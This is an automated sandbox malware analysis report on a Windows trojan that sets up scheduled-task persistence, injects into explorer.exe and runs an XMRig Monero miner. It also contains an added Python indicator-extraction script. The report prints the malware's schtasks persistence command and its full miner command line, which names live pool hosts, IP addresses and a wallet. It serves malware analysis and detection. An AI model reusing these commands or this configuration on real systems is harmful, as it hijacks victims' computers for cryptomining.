
Windows Analysis Report pcNCraWcRk

Overview

General Information

Sample Name: pcNCraWcRk (renamed file extension from none to exe)
Analysis ID: 513056
MD5: 0958fa69ba0e6645c42215c5325d8f76
SHA1: 800666827e118ce78aef55c47864512ef9d3b7a6
SHA256: 1b0c9f3f22d25cd518e480798ee44e8876107b2d37b2e92997c039d4a6c69db1
Tags: exe, trojan

Detection

BitCoin Miner Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected BitCoin Miner
Sigma detected: Xmrig
Writes to foreign memory regions
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Detected Stratum mining protocol
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Creates driver files
Dropped file seen in connection with other malware
Sigma detected: Conhost Parent Process Executions
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • pcNCraWcRk.exe (PID: 1380 cmdline: 'C:\Users\user\Desktop\pcNCraWcRk.exe' MD5: 0958FA69BA0E6645C42215C5325D8F76)
    • conhost.exe (PID: 612 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4564 cmdline: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6456 cmdline: schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 5140 cmdline: 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • services64.exe (PID: 6756 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 0958FA69BA0E6645C42215C5325D8F76)
          • conhost.exe (PID: 5952 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 6784 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • services64.exe (PID: 3496 cmdline: C:\Users\user\AppData\Local\Temp\services64.exe MD5: 0958FA69BA0E6645C42215C5325D8F76)
    • conhost.exe (PID: 5252 cmdline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • sihost64.exe (PID: 5264 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe' MD5: 2497F634A80476AE2EAE956D8B84528E)
        • conhost.exe (PID: 5932 cmdline: 'C:\Windows\System32\conhost.exe' '/sihost64' MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 6764 cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100 MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
(106 entries in the full report; the first five are shown here)

Unpacked PEs

Source | Rule | Description | Author | Strings
17.0.explorer.exe.140000000.12.unpack | PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 | Detects XMRIG crypto coin miners | Florian Roth
  • 0x4d6674: $x1: xmrig.exe
  • 0x4d6560: $x2: xmrig.com
  • 0x4d6638: $x2: xmrig.com
17.0.explorer.exe.140000000.12.unpack | PUA_Crypto_Mining_CommandLine_Indicators_Oct21 | Detects command line parameters often used by crypto mining software | Florian Roth
  • 0x457915: $s01: --cpu-priority=
  • 0x45726d: $s05: --nicehash
17.0.explorer.exe.140000000.12.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x4617f1: $x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
17.0.explorer.exe.140000000.12.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
17.0.explorer.exe.140000000.2.unpack | PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 | Detects XMRIG crypto coin miners | Florian Roth
  • 0x4d6674: $x1: xmrig.exe
  • 0x4d6560: $x2: xmrig.com
  • 0x4d6638: $x2: xmrig.com
(192 entries in the full report; the first five are shown here)

Sigma Overview

Bitcoin Miner:

Sigma detected: Xmrig
Source: Process started, Author: Joe Security, Data: Command: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100, CommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100, CommandLine|base64offset|contains: "+~~), Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe', ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 5952, ProcessCommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100, ProcessId: 6784

System Summary:

Sigma detected: Conhost Parent Process Executions
Source: Process started, Author: omkar72, Data: Command: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', CommandLine: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe', ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 612, ProcessCommandLine: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe', ProcessId: 4564

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: pcNCraWcRk.exe, Virustotal: Detection: 64%
Source: pcNCraWcRk.exe, Metadefender: Detection: 31%
Source: pcNCraWcRk.exe, ReversingLabs: Detection: 81%
Antivirus / Scanner detection for submitted sample
Source: pcNCraWcRk.exe, Avira: detected
Multi AV Scanner detection for domain / URL
Source: xmr.givemexyz.in, Virustotal: Detection: 15%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe, Avira: detection malicious, Label: TR/Agent.ywcqa
Source: C:\Users\user\AppData\Local\Temp\services64.exe, Avira: detection malicious, Label: TR/Agent.wbqui
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\services64.exe, Virustotal: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\services64.exe, Metadefender: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\services64.exe, ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe, Metadefender: Detection: 48%
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe, ReversingLabs: Detection: 82%

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Source: Yara match, File source: 17.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.conhost.exe.2c960a01248.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.conhost.exe.2c960f01280.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.conhost.exe.2c960f01280.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.conhost.exe.2c960a01248.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 18.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.744667827.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.726457226.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.849031612.000002C960EA6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.732288392.000002A7830D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.719362766.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.825932798.0000000140753000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.847850368.000002C9604A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTR
Yara detected BitCoin Miner
Source: Yara match, File source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR
Found strings related to Crypto-Mining
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp, String found in binary or memory: FileDescriptionXMRig miner.
Detected Stratum mining protocol
Source: global traffic, TCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb, source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr (WinRing0 is the third-party kernel driver XMRig loads on Windows to write CPU MSRs for RandomX tuning; the dropped WR64.sys is that driver, which is the device driver the "Creates driver files" and "Sample is not signed and drops a device driver" signatures refer to)
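Pulling the same indicators out of both places they appear in this report: the XMRig command line handed to explorer.exe (process tree and Sigma section above) and the Stratum login frame captured on the wire above. This is an added example, not code from the report or from XMRig. The command line and the JSON payload are copied from this report; the option names handled are XMRig's public ones (--url/-o, --user/-u, --pass/-p, --algo/-a), and the Monero address check (a standard address is 95 base58 characters starting with 4, a subaddress starts with 8) is an assumption about what the --user value should look like.

```python
import json
import re

# Copied from the explorer.exe command line and the Stratum login request in this report.
CMDLINE = (r"C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 "
           r"--randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 "
           r"--url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 "
           r"--user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ "
           r"--pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100")
# Stratum frames are newline-delimited JSON-RPC; the trailing newline is how the miner terminates the request.
STRATUM_LOGIN = ('{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"","pass":"",'
                 '"agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019",'
                 '"rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz",'
                 '"cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv",'
                 '"cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva",'
                 '"argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}\n')

_TOKEN = re.compile(r"'[^']*'|\"[^\"]*\"|\S+")
# Standard Monero address: 95 base58 characters, leading '4' (mainnet) or '8' (subaddress). Assumption.
XMR_ADDR = re.compile(r"[48][1-9A-HJ-NP-Za-km-z]{94}")
# Short XMRig aliases folded onto the long option names we extract.
ALIASES = {"-o": "--url", "-u": "--user", "-p": "--pass", "-a": "--algo"}


def parse_xmrig_args(cmdline):
    """Map each option to the list of values it was given.
    Accepts --opt=value, --opt value and bare switches (stored as True)."""
    toks = [t.strip("'\"") for t in _TOKEN.findall(cmdline)]
    opts = {}
    i = 1
    while i < len(toks):
        key, val = toks[i], True
        if not key.startswith("-"):
            i += 1
            continue
        if "=" in key:
            key, val = key.split("=", 1)
        elif i + 1 < len(toks) and not toks[i + 1].startswith("-"):
            val, i = toks[i + 1], i + 1
        if isinstance(val, str):
            val = val.strip("'\"")
        opts.setdefault(ALIASES.get(key, key), []).append(val)
        i += 1
    return opts


def split_pool(spec):
    """'stratum+tcp://host:port' or 'host:port' -> (host, port or None)."""
    spec = re.sub(r"^[a-z+]+://", "", spec, flags=re.IGNORECASE)
    host, sep, port = spec.rpartition(":")
    if not sep:
        return spec, None
    return host, int(port) if port.isdigit() else None


def extract_config(cmdline):
    """Pools (in fail-over order), wallet, password and algorithm as one IOC record."""
    opts = parse_xmrig_args(cmdline)

    def first(key):
        return opts.get(key, [None])[0]

    wallet = first("--user")
    return {
        "pools": [split_pool(p) for p in opts.get("--url", [])],
        "wallet": wallet,
        "wallet_is_xmr": bool(wallet and XMR_ADDR.fullmatch(wallet)),
        "password": first("--pass"),
        "algo": first("--algo"),
    }


def parse_stratum_login(payload):
    """Parse one Stratum JSON-RPC 'login' frame; returns None for anything else."""
    try:
        msg = json.loads(payload.strip())
    except ValueError:
        return None
    if not isinstance(msg, dict) or msg.get("method") != "login":
        return None
    params = msg.get("params") or {}
    agent = params.get("agent", "")
    miner, _, rest = agent.partition("/")
    algos = params.get("algo", [])
    return {
        "id": msg.get("id"),
        "login": params.get("login"),
        "agent": agent,
        "miner": miner.lower() or None,
        "version": rest.split(" ")[0] if rest else None,
        "algos": algos,
        "randomx": any(a.startswith("rx/") for a in algos),
    }


if __name__ == "__main__":
    print(json.dumps(extract_config(CMDLINE), indent=2))
    print(json.dumps(parse_stratum_login(STRATUM_LOGIN), indent=2))
```

Cross-checking both sources matters here: the captured login frame carries an empty login and pass even though the command line sets --user and --pass, so a detection keyed only on the wallet in the Stratum handshake would miss this traffic, while the agent string still identifies xmrig/6.15.2 and the algorithm list still advertises RandomX (rx/0), the algorithm the command line selects. The pool list comes out in the order XMRig will try it, the --url primary first and the three -o fallbacks after it, which is the order to block or sinkhole them in.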

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Network Connect: 198.23.214.117 144
Source: C:\Windows\explorer.exe, Domain query: xmr.givemexyz.in
Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
Source: global traffic, TCP traffic: 192.168.2.4:49763 -> 198.23.214.117:8080
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr, String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr, String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr, String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
